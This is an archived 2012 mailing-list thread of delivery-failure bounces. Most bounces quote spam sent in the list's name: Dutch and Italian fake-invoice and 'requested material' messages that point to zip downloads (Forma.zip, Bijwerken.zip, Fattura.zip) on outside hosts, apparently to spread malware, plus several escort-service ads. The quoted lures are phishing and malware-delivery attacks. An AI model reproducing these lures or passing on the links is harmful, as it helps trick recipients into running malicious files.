The following message to <a939swim-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'Invalid Recipient: <a939swim@absolutely.nl>'

[-- Attachment #1.2: Type: message/delivery-status, Size: 344 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 946 bytes --]

From: "OrdersCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a939swim-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>
Subject: Factuur | 057481
Date: Mon, 09 Apr 2012 02:38:24 -0500
Message-ID: <23899208.26683117833393-0IdZfJlQYTpxbUIlG84o9xfj7uwXhIKm0E9HWUfgJXw@public.gmane.org>



   
Goeie morgen.
Het antwoord op uw vraag over ons bedrijf, overwogen en uitgevoerd.
Met het resultaat is hier te vinden
Tel./Fax.: +31 (30) 370-06-89.



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-09  7:38 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-04-09  7:38 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 224 bytes --]

The following message to <a941-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'Invalid Recipient: <a941-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>'

[-- Attachment #1.2: Type: message/delivery-status, Size: 336 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 946 bytes --]

From: "OrdersCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a939swim-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>
Subject: Factuur | 057481
Date: Mon, 09 Apr 2012 02:38:24 -0500
Message-ID: <23899208.26683117833393-0IdZfJlQYTpxbUIlG84o9xfj7uwXhIKm0E9HWUfgJXw@public.gmane.org>



   
Goeie morgen.
Het antwoord op uw vraag over ons bedrijf, overwogen en uitgevoerd.
Met het resultaat is hier te vinden
Tel./Fax.: +31 (30) 370-06-89.



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-09  7:38 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-04-09  7:38 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 228 bytes --]

The following message to <a94540-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'Invalid Recipient: <a94540-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>'

[-- Attachment #1.2: Type: message/delivery-status, Size: 340 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 946 bytes --]

From: "OrdersCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a939swim-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>
Subject: Factuur | 057481
Date: Mon, 09 Apr 2012 02:38:24 -0500
Message-ID: <23899208.26683117833393-0IdZfJlQYTpxbUIlG84o9xfj7uwXhIKm0E9HWUfgJXw@public.gmane.org>



   
Goeie morgen.
Het antwoord op uw vraag over ons bedrijf, overwogen en uitgevoerd.
Met het resultaat is hier te vinden
Tel./Fax.: +31 (30) 370-06-89.



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-09  7:38 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-04-09  7:38 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 204 bytes --]

The following message to <a952766-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'Invalid Recipient: <a952766@absolutely.nl>'

[-- Attachment #1.2: Type: message/delivery-status, Size: 342 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 946 bytes --]

From: "OrdersCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a939swim-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>
Subject: Factuur | 057481
Date: Mon, 09 Apr 2012 02:38:24 -0500
Message-ID: <23899208.26683117833393-0IdZfJlQYTpxbUIlG84o9xfj7uwXhIKm0E9HWUfgJXw@public.gmane.org>



   
Goeie morgen.
Het antwoord op uw vraag over ons bedrijf, overwogen en uitgevoerd.
Met het resultaat is hier te vinden
Tel./Fax.: +31 (30) 370-06-89.



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-09  7:38 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-04-09  7:38 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 228 bytes --]

The following message to <a95560-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'Invalid Recipient: <a95560-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>'

[-- Attachment #1.2: Type: message/delivery-status, Size: 340 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 946 bytes --]

From: "OrdersCo" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <a939swim-Hk3lrmVzaNdT6jH3jjkjyA@public.gmane.org>
Subject: Factuur | 057481
Date: Mon, 09 Apr 2012 02:38:24 -0500
Message-ID: <23899208.26683117833393-0IdZfJlQYTpxbUIlG84o9xfj7uwXhIKm0E9HWUfgJXw@public.gmane.org>



   
Goeie morgen.
Het antwoord op uw vraag over ons bedrijf, overwogen en uitgevoerd.
Met het resultaat is hier te vinden
Tel./Fax.: +31 (30) 370-06-89.



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-05 14:16 IBS11
  0 siblings, 0 replies; 183+ messages in thread
From: IBS11 @ 2012-04-05 14:16 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 190 bytes --]

The following message to <samuele.francinella-fiKinI3PMRY1GQ1Ptb7lUw@public.gmane.org> was undeliverable.
The reason for the problem:
5.4.7 - Delivery expired (message too old) 'timeout'

[-- Attachment #1.2: Type: message/delivery-status, Size: 276 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1561 bytes --]

From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ssarcone-KGm45+8e4WzOeuqD6ShaSA@public.gmane.org>
Subject: Re: Richiesta
Date: Mon, 2 Apr 2012 23:55:43 +0200
Message-ID: <005a01cd111b$587d2c80$6489a8c0-7PjSQ+wCsSudNYLACK+ndg@public.gmane.org>



Tu sei la nostra azienda sul forum e stato chiesto di invio di materiale sui componenti
per la riparazione.
Mi dispiace cosi tanto tempo ha incontrato il regista era in vacanza.
Scarica il materiale che sono interessate alla moda, all'indirizzo sotto indicato
http://alasinmedia.pp.fi/hardware/Forma.zip?KrUm2WfH553Ht5twS2I40aiC




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-02 21:56 IBS11
  0 siblings, 0 replies; 183+ messages in thread
From: IBS11 @ 2012-04-02 21:56 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 259 bytes --]

The following message to <lillodilillo.saverio-VGgt2q2+T+FeoWH0uzbU5w@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'#5.1.0 Address rejected lillodilillo.saverio-VGgt2q2+T+FeoWH0uzbU5w@public.gmane.org'

[-- Attachment #1.2: Type: message/delivery-status, Size: 379 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1559 bytes --]

From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ssarcone-KGm45+8e4WzOeuqD6ShaSA@public.gmane.org>
Subject: Re: Richiesta
Date: Mon, 2 Apr 2012 23:55:43 +0200
Message-ID: <005a01cd111b$587d2c80$6489a8c0-7PjSQ+wCsSudNYLACK+ndg@public.gmane.org>



Tu sei la nostra azienda sul forum e stato chiesto di invio di materiale sui componenti
per la riparazione.
Mi dispiace cosi tanto tempo ha incontrato il regista era in vacanza.
Scarica il materiale che sono interessate alla moda, all'indirizzo sotto indicato
http://alasinmedia.pp.fi/hardware/Forma.zip?KrUm2WfH553Ht5twS2I40aiC




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-29 14:36 postmaster-Y8CQj97R1LIkmLvzuZlaBw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-Y8CQj97R1LIkmLvzuZlaBw @ 2012-03-29 14:36 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 171 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       lisse009-EIBgga6/0yRmR6Xm/wNWPw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 311 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3: Type: text/rfc822-headers, Size: 268 bytes --]

From:  "Pay" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To:  <lissenberg-EIBgga6/0yRmR6Xm/wNWPw@public.gmane.org>
Message-ID:  <00ac01cd0db9$2edda180$0200a8c0-//J07LhNTfpNmCTVG0Af2SpxlwaOVQ5f@public.gmane.org>
Subject:  [SPAM] betaling


[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-29 11:20 postmaster-pEPTqz2WXgqNj9Bq2fkWzw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-pEPTqz2WXgqNj9Bq2fkWzw @ 2012-03-29 11:20 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 281 bytes --]

This is an automatically generated Delivery Status Notification.

Unable to deliver message to the following recipients, because the message was forwarded more than the maximum allowed times. This could indicate a mail loop.

       mail-pEPTqz2WXgrzꖖⓨ@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 226 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 7670 bytes --]

From: "Order" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <hodgetzc-pEPTqz2WXgrz+pZb47iToQ@public.gmane.org>
Subject: Factuur 201-369
Date: Thu, 29 Mar 2012 12:59:40 +0200
Message-ID: <2566864763.46032010380315-//J07LhNTfpNmCTVG0Af2SpxlwaOVQ5f@public.gmane.org>



          
Guten Morgen, hodgetzc-pEPTqz2WXgqD1b6SO+vvdA@public.gmane.org

Uw aanvraag links op ons profiel is gemaakt 03/22/2012.
het adres van de download
http://216.119.128.123/Bijwerken.zip?iddownlod227963005025.idmail=hodgetzc-pEPTqz2WXgrz+pZb47iToQ@public.gmane.org




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-28  3:36 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-03-28  3:36 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 184 bytes --]

The following message to <stefania.franchella-7fVwTNPp7YxeoWH0uzbU5w@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.1 - Bad destination email address 'reject'

[-- Attachment #1.2: Type: message/delivery-status, Size: 266 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 637 bytes --]

[-- Attachment #1.3.1: Type: multipart/mixed, Size: 1 bytes --]

From: "Elena" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <stefania.franchella-7fVwTNPp7YxeoWH0uzbU5w@public.gmane.org>
Subject: Hello my sweetheart!
Date: Wed, 28 Mar 2012 07:36:53 +0400
Message-ID: <006a01cd0c94$027c3500$0200a8c0-d/A+yXWgOnhNZqUStOAizwC/G2K4zDHf@public.gmane.org>

[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr @ 2012-03-22 13:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 184 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       ettitogli.davidetutto-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 371 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2378 bytes --]

From: "CFX Group." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ettipasquipasqui60-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org>
Subject: Suspicious URL:Re[2]: Nuovi dati
Date: Thu, 22 Mar 2012 16:47:13 +0300
Message-ID: <111271320.90765511994503-d/A+yXWgOnhNZqUStOAizwC/G2K4zDHf@public.gmane.org>


    
Gentile utente, Monte Biz  
          


La risposta alla tua domanda riguardo al profilo sul nostro sito web 15.03.2012.


Link Statistiche:
http://www.acunbusa.it/i/Pagamento/Fattura.zip





[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr @ 2012-03-22 13:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 169 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       ettmel-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 341 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2378 bytes --]

From: "CFX Group." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ettipasquipasqui60-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org>
Subject: Suspicious URL:Re[2]: Nuovi dati
Date: Thu, 22 Mar 2012 16:47:13 +0300
Message-ID: <111271320.90765511994503-d/A+yXWgOnhNZqUStOAizwC/G2K4zDHf@public.gmane.org>


    
Gentile utente, Monte Biz  
          


La risposta alla tua domanda riguardo al profilo sul nostro sito web 15.03.2012.


Link Statistiche:
http://www.acunbusa.it/i/Pagamento/Fattura.zip





[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr @ 2012-03-22 13:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 169 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       ettner-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 341 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2378 bytes --]

From: "CFX Group." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ettipasquipasqui60-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org>
Subject: Suspicious URL:Re[2]: Nuovi dati
Date: Thu, 22 Mar 2012 16:47:13 +0300
Message-ID: <111271320.90765511994503-d/A+yXWgOnhNZqUStOAizwC/G2K4zDHf@public.gmane.org>


    
Gentile utente, Monte Biz  
          


La risposta alla tua domanda riguardo al profilo sul nostro sito web 15.03.2012.


Link Statistiche:
http://www.acunbusa.it/i/Pagamento/Fattura.zip





[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr @ 2012-03-22 13:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 181 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       ettipasquipasqui60-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 365 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2378 bytes --]

From: "CFX Group." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ettipasquipasqui60-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org>
Subject: Suspicious URL:Re[2]: Nuovi dati
Date: Thu, 22 Mar 2012 16:47:13 +0300
Message-ID: <111271320.90765511994503-d/A+yXWgOnhNZqUStOAizwC/G2K4zDHf@public.gmane.org>


    
Gentile utente, Monte Biz  
          


La risposta alla tua domanda riguardo al profilo sul nostro sito web 15.03.2012.


Link Statistiche:
http://www.acunbusa.it/i/Pagamento/Fattura.zip





[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-22 13:47 postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-qMKci2gRNKhcMntx7duxhRL4W9x8LtSr @ 2012-03-22 13:47 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 168 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       ettkk-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 339 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2378 bytes --]

From: "CFX Group." <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ettipasquipasqui60-e7mAqy1nzl5eoWH0uzbU5w@public.gmane.org>
Subject: Suspicious URL:Re[2]: Nuovi dati
Date: Thu, 22 Mar 2012 16:47:13 +0300
Message-ID: <111271320.90765511994503-d/A+yXWgOnhNZqUStOAizwC/G2K4zDHf@public.gmane.org>


    
Gentile utente, Monte Biz  
          


La risposta alla tua domanda riguardo al profilo sul nostro sito web 15.03.2012.


Link Statistiche:
http://www.acunbusa.it/i/Pagamento/Fattura.zip





[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-08 14:41 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-03-08 14:41 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 172 bytes --]

The following message to <zenden2-aQlLCgIHKDLhUPcrv1QwXQ@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.1 - Bad destination email address 'reject'

[-- Attachment #1.2: Type: message/delivery-status, Size: 260 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1254 bytes --]

From: "your answer" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <zenden2-aQlLCgIHKDLhUPcrv1QwXQ@public.gmane.org>
Subject: news from  kl and spore
Date: Thu, 08 Mar 2012 15:40:45 +0100
Message-ID: <005c01ccfd39$71233e00$6400a8c0-//J07LhNTfpNmCTVG0Af2SpxlwaOVQ5f@public.gmane.org>



new arrival in KL and Spore sms to Phone: +79033891804

http://www.asianescorts.com/agency/russiankl

use sms only please



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-08  6:18 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-03-08  6:18 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 173 bytes --]

The following message to <wim.vink-aQlLCgIHKDLhUPcrv1QwXQ@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.1 - Bad destination email address 'reject'

[-- Attachment #1.2: Type: message/delivery-status, Size: 261 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1419 bytes --]

From: "newinkl" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <wim.vink-aQlLCgIHKDLhUPcrv1QwXQ@public.gmane.org>
Subject: best girl in malaysia
Date: Thu, 08 Mar 2012 01:17:58 -0500
Message-ID: <002801ccfcf3$339bc200$0100a8c0-PBrG2Ygu4YotuMo1XmBnHVHeKjDIEhJXAL8bYrjMMd8@public.gmane.org>




new arrival in KL and Spore sms to Phone: +79033891804
http://www.asianescorts.com/agency/russiankl
use sms only please



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-07 22:52 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-03-07 22:52 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 172 bytes --]

The following message to <maralyn-aQlLCgIHKDLhUPcrv1QwXQ@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.1 - Bad destination email address 'reject'

[-- Attachment #1.2: Type: message/delivery-status, Size: 260 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1358 bytes --]

From: "in kl" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <bella-s7p20SfEDVbhUPcrv1QwXQ@public.gmane.org>
Subject: best girl in malaysia
Date: Wed, 07 Mar 2012 17:52:02 -0500
Message-ID: <4386433197.82471727993072-PBrG2Ygu4YotuMo1XmBnHVHeKjDIEhJXAL8bYrjMMd8@public.gmane.org>



Hi.

new arrival in KL and Spore sms to Phone: +79033891804

http://www.asianescorts.com/agency/russiankl
use sms only please



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-03-01 19:42 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2012-03-01 19:42 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA

Delivery to the following recipient failed permanently:

     samen-7JyGct4xDq8rhIT/V1i8nA@public.gmane.org

Technical details of permanent failure: 
Message rejected by Google Groups. Please visit http://mail.google.com/support/bin/answer.py?hl=en&answer=188131 to review our Bulk Email Senders Guidelines.

----- Original message -----

Received: by 10.216.133.151 with SMTP id q23mr2889990wei.14.1330630930494;
        Thu, 01 Mar 2012 11:42:10 -0800 (PST)
Received: by 10.216.133.151 with SMTP id q23mr2889989wei.14.1330630930472;
        Thu, 01 Mar 2012 11:42:10 -0800 (PST)
Return-Path: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
Received: from srv1157.sd-france.net (srv1157.sd-france.net. [81.93.250.157])
        by mx.google.com with ESMTP id o63si2396819weq.70.2012.03.01.11.42.10;
